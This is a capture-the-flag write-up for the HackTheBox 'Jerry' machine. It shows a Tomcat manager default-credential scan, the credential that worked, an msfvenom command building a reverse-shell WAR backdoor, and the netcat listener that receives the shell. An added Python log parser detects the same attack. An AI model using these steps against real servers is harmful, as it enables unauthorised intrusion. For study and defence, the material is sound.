HackTheBox: jerry by mrh4sh

As usual, we'll start off by scanning the machine.

root@kali:~# nmap -sV -sC -Pn
Starting Nmap 7.70 ( ) at 2018-09-12 06:10 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 999 filtered ports
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

Tomcat 7.0.88 is listening on port 8080. Browsing to the port returns the default Apache Tomcat start page.

[Screenshot: Tomcat default start page]

Let's scan /manager/html for default logins with the Metasploit framework. (Yes, I'm aware that it is also displayed on the 401 Unauthorized page.)

root@kali:~# msfconsole
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts
msf auxiliary(scanner/http/tomcat_mgr_login) > run

The auxiliary module returns a positive result for a single default login: tomcat:s3cret.

[Screenshot: Tomcat default login]

This login gives us access to the Tomcat Web Application Manager on and allows us to deploy .war files, or even better, a malicious .war backdoor. ˙ ͜ʟ˙

Let's try a .war backdoor first. I'll use msfvenom to create the payload and write it to the Desktop.

root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > reverse.war
Payload size: 1085 bytes
Final size of war file: 1085 bytes

There are multiple ways to do this; another is through Metasploit itself. However, it's more fun doing it manually ;-). Let's upload the backdoor through the Web Application Manager and listen on port 4444 with netcat.

[Screenshot: Backdoor war]

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

The backdoor is now displayed as a running application.

[Screenshot: Backdoor war running]

When browsing to it, the reverse shell opens in netcat.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 49208
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


Once the reverse shell is open, we can delete (undeploy) our malicious .war backdoor to (somewhat) cover our tracks; the connection stays open.
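From the defender's side, every step above leaves a trace in Tomcat's access log (default AccessLogValve pattern): a burst of 401s on /manager/html, a manager login from the same host, a POST to /manager/html/upload and, later, the undeploy. The Python below is an added example, not part of the original write-up; it runs that detection over a constructed log sample whose IP addresses, timestamps and context name /reverse/ are made up.

```python
import re
from collections import defaultdict
# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
DEPLOY_PATHS = {'/manager/html/upload', '/manager/text/deploy'}
UNDEPLOY_PATHS = {'/manager/html/undeploy', '/manager/text/undeploy'}
FAIL_THRESHOLD = 5  # 401s from one host before we call it credential guessing

# Constructed sample log (not captured from the box), mirroring this write-up: guessing
# against the manager, a login, a WAR upload, a visit to the new context, the undeploy.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Sep/2018:06:12:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [12/Sep/2018:06:12:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [12/Sep/2018:06:12:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [12/Sep/2018:06:12:02 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [12/Sep/2018:06:12:03 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [12/Sep/2018:06:12:03 -0400] "GET /manager/html HTTP/1.1" 200 19876
10.10.14.5 - tomcat [12/Sep/2018:06:15:40 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 302 -
10.10.14.5 - - [12/Sep/2018:06:16:02 -0400] "GET /reverse/ HTTP/1.1" 200 -
10.10.14.5 - tomcat [12/Sep/2018:06:17:10 -0400] "POST /manager/html/undeploy?path=/reverse HTTP/1.1" 302 -
10.10.10.2 - - [12/Sep/2018:06:20:00 -0400] "GET /docs/ HTTP/1.1" 200 1234
"""

def analyse(log_text, fail_threshold=FAIL_THRESHOLD):
    """Return (host, finding) tuples for suspicious manager-app activity, in log order."""
    failures = defaultdict(int)  # host -> 401s against /manager/ so far
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the access-log pattern
        host, status = m['host'], int(m['status'])
        path = m['path'].split('?', 1)[0]  # drop the query string (CSRF nonce etc.)
        if not path.startswith('/manager/'):
            continue
        if status == 401:
            failures[host] += 1
            if failures[host] == fail_threshold:
                findings.append((host, 'manager-credential-guessing'))
        elif path in DEPLOY_PATHS:
            findings.append((host, f'war-deploy user={m["user"]}'))
        elif path in UNDEPLOY_PATHS:
            findings.append((host, f'war-undeploy user={m["user"]}'))
        elif status == 200 and failures[host] >= fail_threshold:
            findings.append((host, 'manager-login-after-failures'))
            failures[host] = 0  # report the success once per guessing burst
    return findings
```

In a real deployment the same logic runs over the daily localhost_access_log files; a host that trips `manager-credential-guessing` and then `war-deploy` within minutes is exactly the sequence this box walks through.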

After searching for a bit, I found a file located in C:\Users\Administrator\Desktop\flags called "2 for the price of one.txt". Displaying its contents gives us both the user and root flags.

C:\apache-tomcat-7.0.88>cd \Users\Administrator\Desktop\flags
cd \Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type *
type *


This box got criticized for its easiness, instability and non-existent privilege escalation. I found it enjoyable and fun to do. I learned from it, which is what I care about.